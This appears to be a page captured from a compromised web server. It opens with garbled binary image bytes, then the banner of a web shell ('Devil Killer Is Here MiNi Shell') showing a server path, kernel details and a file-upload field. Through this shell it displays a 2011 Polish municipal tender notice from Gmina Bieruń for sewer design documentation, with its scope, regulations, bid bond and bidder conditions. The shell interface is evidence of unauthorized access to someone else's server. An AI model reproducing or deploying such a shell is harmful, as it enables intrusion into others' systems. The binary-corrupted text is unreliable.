JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110310/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110310/79183-N-2011.html

<p class="kh_header"><b>Bieruń: Budowa kanalizacji sanitarnej Jajosty - Kolonia
 - dokumentacja projektowa</b><br>
<b>Numer ogłoszenia: 79183 - 2011; data zamieszczenia: 10.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bieruń reprezentowana przez Burmistrza Miasta Bieruń , Rynek 14, 43-150 Bieruń, woj. śląskie, tel. 032 3242439, faks (032) 2164035; 2164777.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bierun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa kanalizacji sanitarnej Jajosty - Kolonia
 - dokumentacja projektowa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia 
Przedmiotem zamówienia jest opracowanie kompleksowej dokumentacji projektowo-kosztorysowej kanalizacji sanitarnej dla terenów Gminy Bieruń - dzielnica Jajosty - Kolonia, w rejonie ulic:                           ul. Turystyczna, ul. Bojszowska, ul. Szybowa, ul. Okrężna, ul. Peryferyjna,  ul. Dębowa,                                     ul. Dojazdowa, ul. Potokowa, ul. Wspólna, zgodnie z załączonym planem sytuacyjnym w skali                          1:10 000 oraz dokumentacji projektowo-kosztorysowej odtworzenia dróg ( podbudowa + nawierzchnia) po robotach kanalizacyjnych .
Obszar objęty projektowaniem podlega wpływom eksploatacji górniczej i występują  na nim tereny kolejowe. Drogi na tym obszarze są to drogi gminne, powiatowa i wojewódzka. Obszar w części objęty jest Miejscowym Planem Zagospodarowania Przestrzennego.                   
Zakres rzeczowy opracowania dokumentacji:
 1.1  aktualizacja mapy zasadniczej dla celów projektowych  w skali 1:1000 (około 150 ha)
 1.2  wykonanie wypisów z rejestru ewidencji gruntów,
 1.3  wykonanie badań hydrogeologicznych po trasie kanalizacji  co 300 m oraz w miejscach        
        projektowanych przepompowni i przekroczeń przeszkód terenowych(drogi, potoki,
        przejścia pod torami) ,
 1.4  uzyskanie decyzji o ustaleniu lokalizacji inwestycji celu publicznego,
 1.5  uzgodnienie projektu na posiedzeniu ZUD,
 1.6  wykonanie projektu organizacji ruchu na czas budowy wraz z niezbędnymi uzgodnieniami,
 1.7  wykonanie dokumentacji projektowej sieci kanalizacyjnej o długości ok. 19 km na terenach 
        objętych wpływami eksploatacji górniczej  wraz z pisemnymi  zgodami właścicieli gruntów                                                
        na przejście z trasą kanalizacji oraz wszystkimi   wymaganymi   uzgodnieniami branżowymi
        ( około 200 posesji),
 1.8  kompleksowe wykonanie projektów przepompowni ścieków (technologia, konstrukcja,  
        zasilanie energetyczne, sterowanie, automatyka ,ogrodzenie, dojazd, oświetlenie),
 1.9  opracowanie specyfikacji technicznej wykonania i odbioru robót zgodnie z Rozporządzeniem 
        Ministra   Infrastruktury z 2.09.2004 r. (Dz.U. 202.2004.2072),
1.10 studium wykonalności oraz raport oddziaływania na środowisko,
1.11 projekty wykonawcze przyłączy kanalizacyjnych w 2 egzemplarzach dla każdego budynku 
        oddzielnie (krótki opis techniczny, sytuacja, profil podłużny, zestawienie materiałów),
1.12 wytyczne do planu BIOZ,
1.13 zbiorcze zestawienie materiałów instalacyjnych do budowy przyłączy niezbędne dla
        dokonania zakupu  tych materiałów,
1.14 przedmiar robót,
1.15 kosztorys inwestorski sporządzony zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 
        18.05.2004 r. w sprawie metod i podstaw sporządzania kosztorysu inwestorskiego
        (Dz.U. 130.2004 .1389),
1.16 uzyskanie pozwolenia na budowę,
1.17 Inwentaryzacja zieleni - zgodnie z obowiązującymi przepisami oraz w razie konieczności 
        uzyskanie zgody na wycinkę i zbliżenie sieci do drzew i krzewów,
1.18 Uzyskanie wszelkich koniecznych opinii, zgód, zatwierdzeń, uzgodnień i decyzji dla wykonanego 
        projektu (przygotowanie wniosków o wydanie przez dysponentów sieci warunków technicznych, 
        uzyskanie opinii niezbędnych do wydania decyzji o pozwoleniu na budowę inwestycji, 
        uzgodnienia branżowe  - Zakład Energetyczny, Gazowniczy, RPWiK Tychy, uzgodnienie 
        organizacji ruchu itp.), 



1.19 Uzyskanie decyzji o środowiskowych uwarunkowaniach określonej w przepisach ustawy                            
        z dnia 03.10.2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale 
        społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko                              
        (Dz. U. 199.2008. 1227) i sporządzenie raportu oddziaływania na środowisko wraz ze stosownymi 
        postanowieniami i uzgodnieniami oraz dokumentacją techniczną zabezpieczeń wynikających                 
        z raportu oddziaływania na środowisko (jeśli zajdzie konieczność). 
Przedmiary robót oraz kosztorys inwestorski powinny obejmować wszystkie niezbędne roboty związane  z budową kanalizacji i odtworzenia dróg i doprowadzenie całego terenu do stanu pierwotnego.
Studium wykonalności oraz raport oddziaływania na środowisko będą załącznikami do wniosków gminy na dofinansowanie środkami z funduszy strukturalnych UE, dlatego muszą spełniać wymogi stawiane takim dokumentom.
Opracowanie dokumentacji projektowo - kosztorysowej odtworzenia dróg po robotach kanalizacyjnych.
Dokumentacja ma obejmować: 
1.Projekt budowlano-wykonawczy, który powinien zawierać w szczególności: 
a) opis techniczny;
b) część rysunkową, tj.:
- plan sytuacyjny - plansza wymiarowa (1:500),
- przekroje charakterystyczne (1:50),
- profile podłużne (1:500/50),
- przekroje poprzeczne (1:100),
2. Specyfikację techniczną wykonania i odbioru robót.
3. Przedmiary robót.
4. Kosztorysy inwestorskie i zbiorcze zestawienia kosztów.
Oferta powinna uwzględnić uzyskanie wszelkich koniecznych opinii, uzgodnień, pozwoleń, zatwierdzeń i decyzji administracyjnych dla realizacji w/w projektu.
Nawierzchnia ma spełniać wymogi jak dla drogi obciążenia ruchem dla kategorii minimum  KR-3

2.   Przepisy
Dokumentacja projektowo- kosztorysowa musi być opracowana zgodnie z:
- Ustawą z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz.U.113.2010.759                              z późniejszymi zmianami ), a w szczególności art.29 ust.3  Przedmiotu zamówienia nie wolno opisywać przez wskazanie znaków towarowych, patentów lub pochodzenia, chyba że jest to uzasadnione specyfiką przedmiotu zamówienia i nie można opisać przedmiotu zamówienia za pomocą dostatecznie dokładnych określeń, a wskazaniu takiemu  towarzyszą wyrazy  lub   
    równoważny
    oraz aktami wykonawczymi do tej ustawy
-   Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego 
    zakresu i formy dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót 
    budowlanych oraz programu funkcjonalno-użytkowego (Dz.U. 202.2004.2072  z późn. zm.),
-   Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod 
     i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac      
    projektowych oraz planowanych określonych w programie funkcjonalno-użytkowym 
(Dz. U. 130. 2004.1389),
-   Ustawą z dnia 7 lipca 1994 r. Prawo budowlane ( tekst jednolity Dz.U. 243.2010.1623 ) 
    oraz zgodnie z aktami wykonawczymi do tej Ustawy, a w szczególności:
-   Rozporządzeniem Ministra Infrastruktury z dnia 23 czerwca 2003 r. w sprawie informacji 
    dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia 
    (Dz. U. 120. 2003.1126),
-   Ustawą z dnia 16 kwietnia 2004 r. o wyrobach budowlanych (Dz.U. 92.2004.881)
    oraz aktami wykonawczymi do tej ustawy,

-   Rozporządzeniem MSW i A z 05.98.1998 r. w sprawie aprobat i kryteriów technicznych oraz 
    jednostkowego stosowania wyrobów budowlanych (Dz.U. 107.1998.679 z późn. zm.),    
-   Ustawa z dnia 27.03.2003 r. O planowaniu i zagospodarowaniu przestrzennym 
    ( Dz.U. 80.2003.717 z poźn. zmianami),
-   Rozporządzeniem Ministra Transportu i Gospodarki Morskiej z dnia 30.05.2000 r. w sprawie 
    warunków technicznych, jakim powinny odpowiadać obiekty inżynierskie i ich usytuowanie                    
    (  Dz.U. 63. 2000.735),
-   Ustawą z 21.03.1985 r. o drogach publicznych ( Dz.U.19.2007.115 z późn. zm.),
-   Ustawą Prawo wodne ( Dz.U. 239.2005.2019 tekst jednolity),
-   Ustawą O Ochronie przyrody ( Dz.U. 92.2004.880 z póżn. zm.),
-   Ustawą Prawo ochrony środowiska (Dz.U. 25.2008.150   tekst jednolity),
-   Rozporządzeniem Rady Ministrów  z dnia 09.11.2004 r. w sprawie określenia rodzajów 
    przedsięwzięć mogących znacznie oddziaływać na środowisko oraz szczegółowych 
    uwarunkowań związanych z kwalifikowaniem przedsięwzięcia do sporządzenia raportu                           
    o oddziaływaniu na środowisko (Dz.U.257. 2004.2573 z późn. zm.),
-   Ustawą z dnia 04.02.1994 r. Prawo geologiczne i górnicze (Dz.U. 228.2005.1947 z późn. zm.),
-   Rozporządzeniem Ministra Infrastruktury z dnia 03.07.2003 r. w sprawie szczegółowych 
    warunków    technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa 
    ruchu drogowego   i warunków ich umieszczania na drogach (Dz.U. 220.2003.2184),
-  Rozporządzeniem Ministra Środowiska w sprawie projektu prac geologicznych                                                   
   ( Dz.U.  153.2001. 1777 ),
-   Rozporządzeniem Ministra Środowiska w sprawie szczegółowych wymagań, jakim powinna 
    odpowiadać dokumentacja hydrogeologiczna i geologiczno-inżynierska (Dz.U. 201.2005.1673)
-  Ustawą Prawo geodezyjne i kartograficzne ( Dz.U. 240. 2005.2027 tekst jednolity),
-  Rozporządzeniem Ministra Gospodarki Przestrzennej i Budownictwa z dnia 21.02.1995 r. 
   w sprawie rodzajów i zakresu opracowań geodezyjno-kartograficznych obowiązujących                                       
   w   budownictwie  ( Dz.U. 25.1995.133),
-  Rozporządzeniem Ministra Spraw Wewnętrznych i Administracji oraz Rolnictwa i Gospodarki 
   Żywnościowej  w sprawie rozgraniczenia nieruchomości (Dz.U.  45.1999.453)
oraz innymi obowiązującymi przepisami prawa (w tym: ochrony ppoż., bhp, ochrony środowiska), przepisami techniczno-budowlanymi , normami, katalogami, wytycznymi, instrukcjami.

3. Uwagi końcowe
1) Opracowana dokumentacja powinna być kompletna, co oznacza, że powinna zawierać                          
     wszystkie materiały geodezyjne, prawne, potwierdzone wnioski (o wydanie decyzji, dokumentów lub       
     wykonywania jakichkolwiek zmian) oraz decyzje administracyjne.
Przedmiary robót oraz kosztorys inwestorski powinny obejmować wszystkie niezbędne roboty związane  z budową kanalizacji, odtworzenie nawierzchni istniejących dróg, doprowadzenie terenu do stanu pierwotnego.
Projekty budowlane, przedmiary oraz specyfikacje wykonania i odbioru robót należy wykonać :                    - w wersji papierowej w 7 egzemplarzach, 
- w wersji elektronicznej (na płytce CD w w PDF) w 2 egzemplarzach.
Kosztorys inwestorski należy wykonać :
- w wersji papierowej w 2 egzemplarzach,
- w wersji elektronicznej w 2 egzemplarzach w wersji umożliwiającej jego przetwarzanie.
Studium wykonalności oraz raport oddziaływania na środowisko będą załącznikami do wniosków gminy na dofinansowanie środkami z funduszy strukturalnych UE, dlatego muszą spełniać wymogi stawiane takim dokumentom i należy je wykonać:
- w wersji papierowej w 5 egzemplarzach,
- w wersji elektronicznej w 2 egzemplarzach.
Dokumentacja musi odpowiadać wymaganiom Rozporządzenia Ministra Infrastruktury                                      z dn. 2.09.2004 r.   w sprawie szczegółowej formy dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego                                       (Dz.U 202.2004.2072)
Projekt budowlano-wykonawczy powinien zawierać w szczególności:
a) opis techniczny;
b) niezbędne obliczenia;
c) dokładny opis stosowanych materiałów i urządzeń;
d) opracowanie informacji dotyczącej bezpieczeństwa i ochrony zdrowia (BIOZ);
e) część rysunkową, tj.:	
           - plan sytuacyjny ,
           - przekroje charakterystyczne ,
      - profile podłużne,
      - przekroje poprzeczne ,
      - organizację ruchu na czas robót,
      - inne rysunki elementów konstrukcji obiektów, instalacji  oraz urządzeń . 
2)   Przyjęte w trakcie projektowania rozwiązania, materiały należy konsultować z Zamawiającym .
3)   Projektant zobowiązany jest do opisywania proponowanych materiałów i urządzeń za pomocą 
      parametrów technicznych, tzn. bez podawania ich nazw, znaków wskazujących na producenta.
4)   Zaleca się dokonanie wizji lokalnej terenu przeznaczonego pod wykonanie kanalizacji sanitarnej 
      przed złożeniem oferty.
5)   Zamawiający nie przewiduje: zamówień uzupełniających, aukcji elektronicznej , zawarcia umowy 
      ramowej w rozumieniu ustawy  oraz zaliczek na poczet wykonania umowy.
6)   Zamawiający nie dopuszcza składania ofert częściowych wariantowych.
7)   Wymagania w zakresie realizacji zamówienia zawiera również wzór umowy, stanowiący załącznik 
  do SIWZ. 
8)   Do obowiązków wykonawcy, w ramach wykonania przedmiotu zamówienia, będzie też należał 
      udział w procedurze wyboru wykonawcy robót budowlanych w zakresie udzielania odpowiedzi na 
      zapytania dot. rozwiązań zawartych w dokumentacji projektowej.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.24.20.00-6, 71.24.50.00-7, 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.  Zasady wnoszenia wadium
Wadium w wysokości  8 000,00 zł ( słownie:  osiemtysięcyzłotych  ) musi być 
wniesione w terminie, który został podany w punkcie Terminy. 
Wadium wnoszone w pieniądzu należy wpłacić przelewem tzn. przelać z rachunku bankowego wykonawcy na rachunek bankowy zamawiającego. 
w BS O/Tychy numer konta: 26 84350004 0000 0000 6158 0001 z adnotacją: 
Wadium - nr sprawy: ZP. 2710.9.2011 Przetarg nieograniczony na wybór wykonawcy 
zamówienia p.n. Budowa kanalizacji sanitarnej  Jajosty  - Kolonia - dokumentacja projektowa.
 Wniesienie wadium w pieniądzu- oznacza uznanie kwoty wadium ,wpłaconego przelewem,                               na rachunku zamawiającego.
Wadium wnoszone w innej formie niż pieniądz należy złożyć w kasie Urzędu Miejskiego 
w Bieruniu, nie później niż do godz. 12:00  w dniu otwarcia ofert. 



Wadium może być wniesione w następujących formach:
1)	w pieniądzu przelewem,
2)	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, 
       z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	w gwarancjach bankowych,
4)    w gwarancjach ubezpieczeniowych, 
5)	w poręczeniach udzielanych przez podmioty, o których mowa w art.6 b ust.5 pkt 2 ustawy 
       z dnia 9.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109 
       poz.1158 z późniejszymi zmianami).
Jeżeli powyższe dokumenty wystawione są w języku obcym, należy przedłożyć je wraz                            z tłumaczeniem na język polski.
W przypadku wniesienia wadium przez wykonawców wspólnie ubiegających się  o udzielenie nin. zamówienia, należy wskazać  wszystkich wykonawców wspólnie ubiegających się                          o udzielenie zamówienia wraz z podaniem ich nazw i siedzib.                                                                                                                                    Wykonawca, który nie wniesie wadium, zostanie wykluczony z postępowania, zgodnie                                z art.24 ust.2 pkt 2 ustawy, a jego oferta zostanie uznana za odrzuconą.

2. Zasady zwrotu wadium
Wadium wniesione w pieniądzu zamawiający zwróci, zgodnie z art. 46 ust. 4 ustawy pzp wraz 
z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, 
pomniejszonym o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy 
na rachunek wykonawcy.
1) Zgodnie z art. 46 ust.1 ustawy pzp zamawiający zwraca wadium wszystkim wykonawcom 
    niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem 
    wykonawcy, którego  oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem ust. 4a.
2) Wykonawcy którego oferta została wybrana jako najkorzystniejsza zamawiający zwraca wadium 
    niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu 
    zabezpieczenia należytego wykonania umowy.
3) Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed 
    upływem terminu składania ofert.
4) Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na 
    podst. art. 46 ust.1 ustawy pzp , jeżeli w wyniku ostatecznego rozstrzygnięcia odwołania jego oferta  
    zostanie wybrana jako najkorzystniejsza. Wadium zostanie wniesione w terminie określonym przez 
    zamawiającego.

3. Utrata wadium
Zgodnie z zastrzeżeniem art.46 ust.4a ustawy pzp zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca  w odpowiedzi na wezwanie, o którym mowa w art.26 ust.3 ustawy pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art.25 ust.1 ustawy pzp, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie.
Ponadto zgodnie z art.46 ust.5 ustawy pzp zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3) zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie wykonawcy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli                                                                                   przepisy prawa nakładają obowiązek ich posiadania.
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia / nie spełnia, na podstawie przedłożonego przez wykonawcę :
- oświadczenia (zgodnie z art. 22 ust.1 pkt. 1 ustawy pzp).
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy wykazać, że warunek spełnia przynajmniej jeden z wykonawców.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2)	Posiadają wiedzę i doświadczenie:
 Wykonali należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert,                             
 a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, nie mniej niż dwie dokumentacje  techniczne budowy kanalizacji sanitarnej o długości co najmniej 9 km każda, w tym jedną na terenach objętych  wpływami eksploatacji górniczej.
 Ocena spełnienia warunku będzie dokonana wg zasady spełnia/nie spełnia, na podstawie  
 przedłożonych w ofercie: 
-	oświadczenia (zgodnie z art. 22 ust.1 pkt 2 ustawy pzp ) ,
-   dokumentu : wykazu wykonanych usług w zakresie opracowania wymaganych dokumentacji 
   technicznych , z podaniem przedmiotu, dat wykonania i odbiorców oraz załączeniem  
   dokumentów (np. referencji) potwierdzających, że usługi te zostały wykonane należycie.
Przy ocenie spełnienia warunku za wykonane, zamawiający uzna te opracowania ,które zostały wykonane w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, ocena oferty nastąpi łącznie tzn. należy wykazać, że warunek spełnia przynajmniej jeden z wykonawców                                                                                                                                                                                                                                                                                                                                                                                                                        w całości lub dwóch wykonawców spełnia go łącznie, poprzez wykazanie się realizacją po jednym  z ww. projektów .</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują odpowiednim potencjałem technicznym do wykonania zamówienia. 
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/ nie spełnia, na podstawie przedłożonego przez wykonawcę oświadczenia (zgodnie z art. 22 ust.1 pkt 3 ustawy pzp ).
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy wykazać, że warunek spełnia przynajmniej jeden z wykonawców.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują odpowiednimi osobami zdolnymi do wykonania zamówienia tzn. dysponują:
 a) osobą, która posiada uprawnienia budowlane do projektowania bez ograniczeń   w specjalności 
     sieci zewnętrznych kanalizacyjnych sanitarnych, a w przedmiotowym zamówieniu będzie  
     uczestniczyć  w wykonaniu zamówienia;  oraz
b) osobą, która posiada uprawnienia budowlane do projektowania bez ograniczeń w specjalności 
     drogowej, a w przedmiotowym zamówieniu będzie uczestniczyć  w wykonaniu zamówienia. 
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/ nie spełnia, na podstawie przedłożonego przez wykonawcę :
-	oświadczenia (zgodnie z art. 22 ust.1 pkt 3 ustawy pzp ) ,
-	dokumentu : wykazu osób, które będą  uczestniczyć w wykonywaniu zamówienia wykonaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości , wraz                      z informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia,              a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami. 
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, ocena oferty nastąpi łącznie tzn. należy wykazać, że warunek spełnia jeden z wykonawców                                                                                                                                                                                                                                                                                                                                                                                                                        w całości lub dwóch wykonawców spełnia go łącznie, poprzez dysponowanie po jednej  osobie z wymaganymi uprawnieniami.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia :         
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/ nie spełnia, na podstawie       przedłożonego przez wykonawcę :
- 	oświadczenia (zgodnie z art. 22 ust.1 pkt 4 ustawy pzp ).
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy wykazać, że warunek spełnia przynajmniej jeden z wykonawców.</p>
</li></ul></li></ul>
